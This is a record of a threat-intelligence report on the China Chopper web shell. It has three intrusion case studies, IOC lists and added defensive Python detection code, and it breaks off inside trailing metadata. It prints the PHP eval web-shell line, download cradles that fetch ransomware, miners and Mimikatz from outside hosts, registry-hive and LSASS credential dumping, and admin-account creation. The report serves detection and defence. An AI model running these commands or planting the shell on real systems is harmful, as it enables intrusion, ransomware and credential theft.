{
	"id": "b1e41f29-af9d-4c7a-b832-b9f66ea45283",
	"created_at": "2026-04-06T00:12:50.286803Z",
	"updated_at": "2026-04-10T13:11:39.425294Z",
	"deleted_at": null,
	"sha1_hash": "c417329a7eae9f54d26b9cafe4325ee95320f48b",
	"title": "China Chopper still active 9 years later",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 572928,
	"plain_text": "China Chopper still active 9 years later\r\nBy Vanja Svajcer\r\nPublished: 2019-08-27 · Archived: 2026-04-05 23:10:46 UTC\r\nBy Paul Rascagneres and Vanja Svajcer.\r\nIntroduction\r\nThreats will commonly fade away over time as they're discovered, reported on and detected. But China Chopper has found a way to stay relevant, active and effective nine years after its initial discovery. China Chopper is a web shell that allows attackers to retain access to an infected system using a client-side application which contains all the logic required to control the target. Several threat groups have used China Chopper, and over the past two years we've seen several different campaigns utilizing this web shell; we chose to document the three most active campaigns in this blog post.\r\nWe decided to take a closer look at China Chopper after security firm Cybereason reported on a massive attack against telecommunications providers called \"Operation Soft Cell,\" which reportedly utilized China Chopper. Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017, which shows that even nine years after its creation, attackers are using China Chopper without significant modifications. This web shell is widely available, so almost any threat actor can use it. This also means it's nearly impossible to attribute attacks to a particular group using only the presence of China Chopper as an indicator.\r\nThe usage of China Chopper in recent campaigns shows that a lot of old threats never really die, and defenders on the internet need to be looking out for malware both young and old.\r\nWhat is China Chopper?\r\nChina Chopper is a tool that allows attackers to remotely control a target system. The target must be running a web server application before it can be targeted by the tool.\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 1 of 14\n\n
The web shell works on different platforms, but in this case we focused only on compromised Windows hosts. China Chopper has been used by some state-sponsored actors such as Leviathan and Threat Group-3390, but during our investigation we've seen actors with varying skill levels.\r\nIn our research, we discovered both Internet Information Services (IIS) and Apache web servers compromised with China Chopper web shells. We do not have additional data about how the web shell was installed, but there are several web application frameworks, such as older versions of Oracle WebLogic or WordPress, that may have been targeted with known remote code execution or file inclusion exploits.\r\nChina Chopper provides the actor with a simple GUI that allows them to configure servers to connect to and to generate the server-side code that must be added to the targeted website's code in order to communicate.\r\n[Image: China Chopper GUI]\r\nThe server-side code is extremely simple and contains, depending on the application platform, just a single line of code. The backdoor supports ASP.NET or PHP.\r\nHere is an example of the server-side code for a compromised PHP application:\r\n\u003c?php @eval($_POST['test']);?\u003e\r\nThe leading @ suppresses PHP error output, and the parameter name (here test) is chosen by the operator when the server code is generated, so a signature keyed on one particular parameter name is of little use. We cannot be sure if the simplicity of the server code was a deliberate decision on the part of the China Chopper developers to make detection more difficult, but pattern matching on such a short snippet may produce some false positive detections; any server-side code that evaluates a raw request parameter deserves a look regardless of the name used.\r\nThe China Chopper client communicates with affected servers using HTTP POST requests. The only function of the server-side code is to evaluate the request parameter specified during the configuration of the server code in the client GUI.\r\n
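As an added example (this code is not from the Talos post and not part of China Chopper), the following Python parses a form-encoded POST body the way a defender would reconstruct it from a packet capture: it finds the parameter carrying the eval(base64_decode($_POST[z0])) loader even when control bytes are padded into it, base64-decodes the z0..zn arguments and, for virtual terminal requests, recovers the operator's command from the client's wrapper, whose trailing \u0026echo [S]\u0026cd\u0026echo [E] string is the marker discussed in this section. The sample request is constructed in code by build_sample_request; the web root C:\\inetpub\\wwwroot\\, the parameter name test and the shortened z0 stub are assumptions.

```python
import base64
from urllib.parse import parse_qs, urlencode

# Trailer the post reports at the end of every virtual-terminal (cmd) request.
TERMINAL_MARKER = '&echo [S]&cd&echo [E]'
# Loader wrapper the client places in the operator-configured eval parameter.
LOADER_WRAPPER = 'eval(base64_decode($_POST[z0]))'


def strip_control(text):
    """Drop control characters; the captured request has a 0x01 byte after 'eval'."""
    return ''.join(ch for ch in text if ord(ch) >= 0x20)


def decode_z_params(params):
    """Base64-decode every zN parameter. Returns {name: text, or None if not base64}."""
    decoded = {}
    for name, values in params.items():
        if len(name) > 1 and name[0] == 'z' and name[1:].isdigit():
            # A client that sends '+' unescaped gets it turned into a space by parse_qs;
            # base64 never contains spaces, so putting '+' back is safe.
            raw = values[0].replace(' ', '+')
            try:
                decoded[name] = base64.b64decode(raw, validate=True).decode('utf-8', 'replace')
            except ValueError:        # binascii.Error is a ValueError
                decoded[name] = None  # keep the key so the analyst sees a malformed argument
    return decoded


def analyze_request(body):
    """Parse a form-encoded POST body. Returns None unless it carries the China Chopper
    loader; otherwise the eval parameter name, the decoded zN values and, for virtual
    terminal requests, the operator's command with the client's cd/echo wrapper removed."""
    params = parse_qs(body, keep_blank_values=True)
    eval_param = None
    for name, values in params.items():
        if LOADER_WRAPPER in strip_control(values[0]):
            eval_param = name
            break
    if eval_param is None:
        return None
    z = decode_z_params(params)
    result = {'eval_param': eval_param, 'z': z, 'terminal': False, 'command': None}
    cmd = z.get('z2') or ''
    if z.get('z1') == 'cmd' and cmd.endswith(TERMINAL_MARKER):
        result['terminal'] = True
        inner = cmd[:-len(TERMINAL_MARKER)]
        # The client prepends 'cd /d "<webroot>"&' to whatever the operator typed.
        if inner.startswith('cd /d ') and '&' in inner:
            inner = inner.split('&', 1)[1]
        result['command'] = inner
    return result


def build_sample_request(param, command):
    """Constructed sample (not captured traffic): encode a terminal request the way the
    client does. The web root and the z0 stub are assumptions; the real z0 is longer."""
    loader = '@eval' + chr(1) + '(base64_decode($_POST[z0]));'
    z0 = '@ini_set(\"display_errors\",\"0\");@set_time_limit(0);echo(\"->|\");die();'
    z2 = 'cd /d \"C:\\inetpub\\wwwroot\\\"&' + command + TERMINAL_MARKER
    fields = [(param, loader)]
    for name, value in (('z0', z0), ('z1', 'cmd'), ('z2', z2)):
        fields.append((name, base64.b64encode(value.encode()).decode()))
    return urlencode(fields)


if __name__ == '__main__':
    wire = build_sample_request('test', 'netstat -an | find \"ESTABLISHED\"')
    print(wire[:80] + '...')
    print(analyze_request(wire))
```

Run stand-alone it prints the encoded sample and the parsed result; in practice the body would come from a proxy log or a reassembled HTTP stream. Because the eval parameter name is operator-chosen, the check keys on the loader wrapper and the zN arguments rather than on the name, and the control-byte stripping means the %01 padding seen in the capture does not defeat it.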
In our example, the expected parameter name is \"test.\" The communication over HTTP can be easily spotted in network packet captures, provided the traffic is not TLS-encrypted at the point of capture.\r\nChina Chopper contains a remote shell (Virtual Terminal) function whose first suggested command is 'netstat -an|find \"ESTABLISHED\"', and it is very likely that this command will be seen in process creation logs on affected systems, as the command line of a cmd.exe child of the web server process (w3wp.exe for IIS, httpd.exe for Apache).\r\n[Image: China Chopper's first suggested Terminal command]\r\nWhen we analyze the packet capture, we can see that the parameter \"test\" contains another eval statement. Depending on the command, the client will submit a certain number of parameters, z0 to zn. All parameters are encoded with a standard base64 encoder before submission. Parameter z0 always contains the code to parse the other parameters, launch the requested commands and return the results to the client. The request as captured (the base64 value is cut off in the archived copy):\r\ntest=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B\u0026z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRf\r\nEncoded China Chopper POST request with parameters. Note the %01 byte between eval and the opening parenthesis: a signature that expects the literal string eval( will miss it.\r\nIn this request, the decoded parameters are (the middle of z0 is cut off in the archived copy):\r\nz0 - @ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\"-\u003e|\");;$p=base64_deco [...] ret={$ret} [...] \":\"\";;echo(\"|\u003c-\");die();\r\nz1 - cmd\r\nz2 - cd /d \"C:\\xampp\\htdocs\\dashboard\\\"\u0026netstat -an | find \"ESTABLISHED\"\u0026echo [S]\u0026cd\u0026echo [E]\r\nThe loader in z0 switches off error display and the execution time limit, then brackets its output with -\u003e| and |\u003c- so the client can cut the command output out of whatever else the page returns. The end of the command \"\u0026echo [S]\u0026cd\u0026echo [E]\" seems to be present in all virtual terminal requests and may be used as a reliable indicator to detect China Chopper activity in packet captures or behavioral logs; the client itself prepends the cd /d into the web root, so the operator typed only the netstat command.\r\nApart from the terminal, China Chopper includes a file manager (with the ability to create directories, download files and change file metadata), a database manager and a rudimentary vulnerability scanner.\r\nWhat follows is our view into three different compromises, each with different goals, tools, techniques and likely different actors.\r\n[Image: Timeline of the observed case studies]\r\nCase study No. 1: Espionage context\r\nWe identified the usage of China Chopper in a couple of espionage campaigns. Here, we investigate a campaign targeting an Asian government organization. In this campaign, China Chopper was used in the internal network, installed on a few web servers used to store potentially confidential documents.\r\nThe purpose of the attacker was to obtain documents and database copies. The documents were automatically compressed using WinRAR (the second command line is cut off in the archived copy):\r\ncd /d C:\\Windows\\Working_Directory\\\r\nrenamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.x\r\nThis command creates an archive containing only documents modified after the date passed with -ta, with -n restricting the input to the listed document types and -m3 selecting normal compression. The archives are protected with a strong password containing uppercase, lowercase and special characters; the passwords were longer than 15 characters. Because -hp (rather than -p) is used, the archive headers are encrypted as well, so even the file names inside the archive are hidden from anyone who recovers it.\r\nWe assume the attacker ran this command periodically in order to get only new documents and minimize the quantity of exfiltrated data.\r\nOn the same target, we identified additional commands executed with China Chopper using WinRAR:\r\nrar a -inul -ed -r -m3 -taDate -hp\u003cprofanity\u003e ~ID.tmp c:\\directory_to_scan\r\nHere -inul silences all messages, -ed skips empty directories and -r recurses into subdirectories. China Chopper is a public hacking tool and we cannot tell if in this case the attacker is the same actor as before. But the rar command line here is sufficiently different to note that it could be a different actor. 
The actor used an offensive phrase for a password, which is why we've censored it here.\r\nThe attacker deployed additional tools to execute commands on the system (the command line is cut off in the archived copy):\r\nC:\\windows\\Microsoft.NET\\Framework\\v2.0.50727\\MSBuild.exe C:\\windows\\temp\\Document.csproj /p:AssemblyName=C:\\w\r\nMSBuild.exe is used to compile and execute a .NET application with two arguments: the ScriptFile argument contains a PowerShell script encrypted with the value of the key argument. This is the MSBuild inline task technique: MSBuild is a signed Microsoft binary that compiles the code embedded in the project file at build time, so no attacker-compiled executable needs to be written to disk. Here is the .NET code:\r\n[Image: .NET loader code]\r\nThe .NET loader supports encrypted files or URLs as the script argument. If the operator uses an HTTP request, the loader downloads the payload with one of the hardcoded User-Agents. The loader decrypts the downloaded file and executes it:\r\n[Image: Hardcoded User-Agent strings]\r\nIn our case, the purpose of the decrypted payload was to perform a database dump:\r\npowershell.exe -exe bypass -nop -w hidden -c Import-Module C:\\windows\\help\\help\\helper.ps1;\r\nRun-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName;\r\nConvert Zero Datetime=True' -Query 'Select * from table where UID \u003e 'Value' -Dump\r\nThe \"where UID\" condition in the SQL query has the same purpose as the date in the previous WinRAR command. We assume the attacker performs the query periodically and does not want to dump the entire database, but only the new entries. Note also that the connection string logs in as root with an empty password, so the local MySQL instance required no credentials at all. It is interesting to see that after dumping the data, the attacker checks if the generated file is available and if it contains any data:\r\ndir /O:D c:\\working_directory\\db.csv\r\npowershell -nop -exec bypass Get-Content \"c:\\working_directory\\db.csv\" | Select-Object -First 10\r\nHow are the file archives and the database dumps exfiltrated? 
Since the targeted server is in an internal network, the attacker simply authenticates to another internal host over SMB (a net use session against its IPC$ share) and moves the file to a share on that host.\r\ncd /d C:\\working_directory\\\r\nnet use \\\\192.168.0.10\\ipc$ /user:USER PASSWORD\r\nmove c:\\working_directory\\db.csv \\\\192.168.0.10\\destination_directory\r\nThe attacker must already hold credentials for the remote system in order to exfiltrate data this way. We have also seen an HTTP tunnel tool used to create a network tunnel between the infected system and a C2 server.\r\nCase No. 2: Multi-purpose campaign\r\nWe observed another campaign targeting an organisation located in Lebanon. While our first case describes a targeted campaign with the goal of exfiltrating data from internal servers, this one is the opposite: an auxiliary public website compromised by several attackers for different purposes.\r\nWe identified actors trying to deploy ransomware on the vulnerable server using China Chopper. The first attempt was Sodinokibi ransomware, fetched with certutil, a signed Windows binary that will download a URL to a file:\r\ncertutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\\Users\\UserA\\AppData\\Local\\Temp\\radm.exe\r\nThe second delivered the Gandcrab ransomware; on a 64-bit host the script relaunches the 32-bit PowerShell from SysWOW64 before loading the payload (the Start-Process argument is cut off in the archived copy):\r\nIf($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){\r\nStart-Process -FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument \"IEX ((new-object\r\nInvoke-ACAXGZFTTDUDKY;\r\nStart-Sleep -s 1000000;\"\r\n} else {\r\nIEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));\r\nInvoke-ACAXGZFTTDUDKY;\r\nStart-Sleep -s 1000000;\r\n}\r\nHere is the script hosted on Pastebin:\r\n[Image: Reflective loader downloaded from pastebin.com]\r\nThe script carries a hardcoded PE file (Gandcrab) at its end and executes it in memory using a reflective DLL-loading technique.\r\nIn addition to the ransomware, we identified another actor trying to execute a Monero miner on the vulnerable server with China Chopper (the command line is cut off in the archived copy):\r\nPowershell -Command -windowstyle hidden -nop -enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155\r\nHere's a look at the miner configuration:\r\n[Image: Monero miner configuration]\r\nSome of the detected activity may have been manual and performed in order to get OS credentials.\r\nSaving the registry hives that hold the local account hashes and LSA secrets (the SAM and SECURITY hives can be decrypted offline with the boot key from the SYSTEM hive):\r\nreg save hklm\\sam sam.hive\r\nreg save hklm\\system system.hive\r\nreg save hklm\\security security.hive\r\nUsing Mimikatz (with a few hiccups along the way):\r\npowershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/Powe\r\nInvoke-Mimikatz \u003e\u003ec:\\1.txt\r\npowershell IEX\",\"(New-Object\",\"Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCre\r\nC:\\Windows\\System32WindowsPowerShell\\v1.0\\powershell.exe IEX\r\n(New-Object\",\"Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master\r\nInvoke-Mimikatz\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe [Environment]::Is64BitProcess\r\npowershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/\r\nInvoke-Mimikatz \u003e\u003ec:\\1.txt\r\nAttempting to dump password hashes using a PowerShell module and the command line:\r\nIEX (New-Object\r\nNet.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1'\r\nThe attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory. 
In addition to the multiple attempts to dump credentials, the attackers had to deal with typos: missed spaces, wrong commands or switched letters.\r\nOne of the actors successfully acquired the credentials and tried to pivot internally by using the credentials and \"net use\" commands.\r\nFinally, several remote access tools such as Gh0stRAT and the Venom multi-hop proxy were deployed on the machine, as well as a remote shell written purely in PowerShell.\r\nCase No. 3: Web hosting providers compromised\r\nIn one campaign, we discovered an Asian web-hosting provider under attack, with the most significant compromise spanning several Windows servers over a period of 10 months. Once again, we cannot be sure if this was a single actor or multiple groups, since the activities differ depending on the attacked server. We show just a subset of observed activities.\r\nServer 1\r\nGenerally, the attackers seek to create a new user and then add the user to the group of users with administrative privileges, presumably to access and modify other web applications hosted on the same physical server.\r\ncd /d C:\\compromisedappdirectory\u0026net user user pass /add\r\ncd /d C:\\compromisedappdirectory\u0026net localgroup administrattors user /add\r\nNotice the misspelling of the word \"administrators\": the account is created, but the second command fails because no group of that name exists. The actor realizes that the user did not end up with administrative rights and attempts a different technique. They download and install an archive containing executables and trivially modified source code of the password-stealing tool \"Mimikatz Lite\" as GetPassword.exe.\r\nThe tool investigates the Local Security Authority Subsystem (LSASS) memory space in order to find, decrypt and display retrieved passwords. The only change compared with the original tool is that the actors change the color and the code page of the command window. 
The color is changed so that green text is displayed on a black background and the active console code page is changed to the Chinese code page 936.\r\nFinally, the actor attempts to dump the database of a popular mobile game, \"Clash of Kings,\" possibly hosted on a private server.\r\nServer 2\r\nAn actor successfully tested China Chopper on a second server and stopped the activity. However, we also found another Monero cryptocurrency miner, just as we found commodity malware on other systems compromised with China Chopper.\r\nThe actors first reset the Access Control List for the Windows temporary files folder and take ownership of the folder. They then allow the miner executable through the Windows Firewall (using the legacy netsh firewall context, with the exception named \"Windows Update\" to blend in) and finally launch the mining payload.\r\nC:\\Windows\\system32\\icacls.exe C:\\Windows\\Temp /Reset /T\r\nC:\\Windows\\system32\\takeown.exe /F C:\\Windows\\Temp\r\nC:\\Windows\\system32\\netsh.exe Firewall Add AllowedProgram C:\\Windows\\Temp\\lsass.eXe Windows Update Enable\r\nC:\\Windows\\Temp\\lsass.eXe\r\nThe miner is named lsass.eXe to pass as the Local Security Authority process. The genuine lsass.exe runs once, from C:\\Windows\\System32, with wininit.exe as its parent; an image of that name under C:\\Windows\\Temp is a masquerade and an easy hunt in process creation telemetry.\r\nServer 3\r\nThe attack on this server starts by downloading a number of public and private tools, though we were not able to retrieve them.\r\nThe actor attempts to exploit CVE-2018-8440, an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call (ALPC), to elevate privileges using a modified proof-of-concept exploit.\r\ncd /d C:\\directoryofcompromisedapp\u0026rundll32 C:\\directoryofcompromisedapp\\ALPC-TaskSched-LPE.dll,a\r\nThe attacker launches several custom tools and an available tool that attempts to create a new user, iis_uses, and change DACLs to allow the user to modify certain operating system objects.\r\nThe attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server. This is likely done to compromise other sites or to run a web defacement campaign.\r\ncacls \\. C:\\path_to_a_website /T /E /C /G Everyone:F\r\nThe cacls switches grant (/G) the Everyone group full control (F) of the site directory, recursing into subdirectories (/T), editing the existing ACL rather than replacing it (/E) and continuing past errors (/C).\r\nFinally, the actor attempts to launch a PowerShell Mimikatz loader to get more credentials from memory and save the credentials into a text file (the command line is cut off in the archived copy):\r\npowershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.co\r\n-Encoding ASCII outputfile.txt\r\nServer 4\r\nThe China Chopper actor's activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server.\r\nOnce the privilege escalation was successful, the actor adds a new user account and adds the account to the administrative group (net.exe accepts the abbreviated switch /ad for /add):\r\nnet user admin admin /ad\r\nnet localgroup administrators admin /ad\r\nThe attacker next logs on to the server with the newly created user account and launches a free tool, replacestudio32.exe, a GUI utility that searches through text-based files and replaces one string with another. Once again, this could be used to affect all sites hosted on the server or simply deface pages.\r\nConclusion\r\nInsecure web applications provide an effective entry point for attackers and allow them to install additional tools such as web shells, conduct reconnaissance and pivot to other systems.\r\nAlthough China Chopper is an old tool, we still see it being used by attackers with various goals and skill levels, and in this post we showed some of the common tools, techniques and processes employed in three separate breaches. 
Because it is so widely available and easy to use, it's impossible to confidently connect it to any particular actor or group.\r\nIn our research we documented three separate campaigns active over a period of several months. This corroborates the claim that the average time to detect an intrusion is over 180 days, and implies that defenders should approach building their security teams and processes around the assumption that the organization has already been breached.\r\nIt is crucial that an incident response team has permission to proactively hunt for breaches, not only to respond to alerts raised by automated detection systems or escalated by first-line security analysts.\r\nWhen securing the infrastructure it is important to keep internal as well as external-facing web servers, applications and frameworks up to date with the latest security patches to mitigate the risk of compromise with already known exploits.\r\nDespite its age, China Chopper is here to stay, and we will likely see it in the wild going forward.\r\nCoverage\r\nIntrusion prevention systems such as SNORT® provide an effective tool to detect China Chopper activity due to the specific strings present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response (EDR) tools such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. 
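To show what process-invocation tracking surfaces for the tradecraft in the three case studies, here is an added example (not part of the Talos post and not a Cisco product rule): a set of hunting checks in Python run over constructed process-creation events modelled on the command lines quoted above, including the genuine LSASS and a benign cmd.exe so the checks are seen not to fire on them. The event field names (parent_image, image, command_line) and the sample paths are assumptions. The checks cover a web server process (w3wp.exe, httpd.exe) spawning a shell, the virtual terminal marker, reg save of the SAM/SYSTEM/SECURITY hives, an lsass.exe image outside System32, a net localgroup addition to Administrators (tolerant of the administrattors typo), certutil -urlcache downloads, PowerShell DownloadString cradles, MSBuild .csproj execution and netsh firewall exceptions.

```python
WEB_SERVERS = {'w3wp.exe', 'httpd.exe', 'php-cgi.exe'}   # parents that should never spawn shells
SHELLS = {'cmd.exe', 'powershell.exe'}
CHOPPER_MARKER = '&echo [S]&cd&echo [E]'                # trailer of every China Chopper terminal command


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def hunt(event):
    """Return the hunting hits for one process-creation event
    (a dict with parent_image, image and command_line)."""
    parent = basename(event['parent_image'])
    image = basename(event['image'])
    low = event['command_line'].lower()
    hits = []
    if parent in WEB_SERVERS and image in SHELLS:
        hits.append('web server spawned a shell (web shell command execution)')
    if CHOPPER_MARKER in event['command_line']:
        hits.append('China Chopper virtual terminal marker')
    if 'reg save hklm\\' in low:
        hits.append('registry hive dump (SAM/SYSTEM/SECURITY)')
    if image == 'lsass.exe' and not event['image'].lower().startswith('c:\\windows\\system32\\'):
        hits.append('lsass.exe masquerade outside System32')
    if 'net localgroup administrat' in low and ' /ad' in low:   # also catches the administrattors typo
        hits.append('account added to local Administrators')
    if 'certutil' in low and '-urlcache' in low and '-f ' in low:
        hits.append('certutil used as a downloader')
    if 'downloadstring(' in low and 'iex' in low:
        hits.append('PowerShell download cradle')
    if image == 'msbuild.exe' and '.csproj' in low:
        hits.append('MSBuild project file execution (inline task loader)')
    if 'netsh' in low and 'allowedprogram' in low:
        hits.append('firewall exception added with netsh')
    return hits


def hunt_all(events):
    """Map the index of every event that produced at least one hit to its hits."""
    return {i: hits for i, hits in enumerate(hunt(e) for e in events) if hits}


# Constructed events modelled on the command lines quoted in this post (not real telemetry).
SAMPLE_EVENTS = [
    {'parent_image': 'C:\\Windows\\System32\\inetsrv\\w3wp.exe', 'image': 'C:\\Windows\\System32\\cmd.exe',
     'command_line': 'cmd /c cd /d \"C:\\inetpub\\wwwroot\\\"&netstat -an | find \"ESTABLISHED\"' + CHOPPER_MARKER},
    {'parent_image': 'C:\\Windows\\System32\\cmd.exe', 'image': 'C:\\Windows\\System32\\reg.exe',
     'command_line': 'reg save hklm\\sam sam.hive'},
    {'parent_image': 'C:\\Windows\\System32\\cmd.exe', 'image': 'C:\\Windows\\Temp\\lsass.eXe',
     'command_line': 'C:\\Windows\\Temp\\lsass.eXe'},
    {'parent_image': 'C:\\Windows\\System32\\cmd.exe', 'image': 'C:\\Windows\\System32\\net.exe',
     'command_line': 'net localgroup administrattors user /add'},
    {'parent_image': 'C:\\Windows\\System32\\cmd.exe', 'image': 'C:\\Windows\\System32\\certutil.exe',
     'command_line': 'certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\\Users\\UserA\\AppData\\Local\\Temp\\radm.exe'},
    {'parent_image': 'C:\\Windows\\System32\\wininit.exe', 'image': 'C:\\Windows\\System32\\lsass.exe',
     'command_line': 'C:\\Windows\\system32\\lsass.exe'},        # the genuine LSASS: must not fire
    {'parent_image': 'C:\\Windows\\explorer.exe', 'image': 'C:\\Windows\\System32\\cmd.exe',
     'command_line': 'cmd /c dir'},                                 # benign
]

if __name__ == '__main__':
    for index, hits in hunt_all(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]['command_line'][:60], hits)
```

The checks are deliberately plain substring matches so they port to whatever query language the EDR or SIEM speaks. The first one matters most: a web server worker process has no business spawning cmd.exe or powershell.exe at all, whichever web shell is behind it, so it catches China Chopper and its successors alike.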
Try AMP for free here.\r\nAdditional ways our customers can detect and block these threats are listed below.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.\r\nOpen Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nIOCs\r\nChina Chopper clients:\r\n9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a\r\nc5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef\r\nb84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07\r\n58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc\r\nCase study 1\r\nFiles:\r\nb1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 - downloader\r\nfe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 - proxy\r\n28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 - downloader dll\r\nc9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e - nbtscan tool\r\ndbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c - Miner\r\nLegitimate tools:\r\n
d76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 - rar\r\n46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd - renamed rar\r\n96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 - renamed rar\r\nIP addresses:\r\n69.165.64.100\r\n59.188.255.184\r\n154.211.12.153\r\n185.234.218.248\r\nCase study 2\r\nFiles:\r\n02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 - Gandcrab loader\r\n1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 - Gandcrab\r\n219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 - Miner/dropper\r\n4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 - masscan dropped by the miner\r\na06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb - remote exploit\r\n919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a - multihop Venom proxy\r\nURLs:\r\nhxxp://101.78.142.74:8001/xavg/javae[.]exe\r\nhxxp://107.181.160.197/win/3p/checking[.]ps1\r\nhxxp://107.182.28.64/t0[.]txt\r\nhxxp://139.180.199.167:1012/update[.]ps1\r\nhxxp://172.96.241.10:80/a\r\nhxxp://185.228.83.51/config[.]c\r\nhxxp://188.166.74.218/radm[.]exe\r\nhxxp://188.166.74.218/untitled[.]exe\r\nhxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1\r\nhxxp://202.144.193.177/1[.]ps1\r\nhxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1\r\nhxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1\r\nhxxp://is.gd/oeoFuI\r\nhxxps://pastebin.com/raw/Hd7BmJ33\r\nhxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1\r\nhxxp://fid.hognoob.se/download[.]exe\r\nhxxp://uio.hognoob.se:63145/cfg[.]ini\r\nhxxp://fid.hognoob.se/HidregSvc[.]exe\r\nhxxp://45.55.211.79/.cache/untitled[.]exe\r\nIP addresses:\r\n185.234.218.248\r\nCase study 3\r\nFiles:\r\nfe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 - Mini Mimikatz archive\r\n2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 - CVE-2015-0062\r\nf3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 - CVE-2015-1701/CVE-2016-0099\r\nb46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab - a tool for adding and elevating a user\r\nab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f - ACLs editing for defaced sites\r\nLegitimate tools:\r\nee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 - Replace Studio\r\nd1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 - part of Replace Studio\r\nSource: https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html"
	],
	"report_names": [
		"china-chopper-still-active-9-years-later.html"
	],
	"threat_actors": [
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
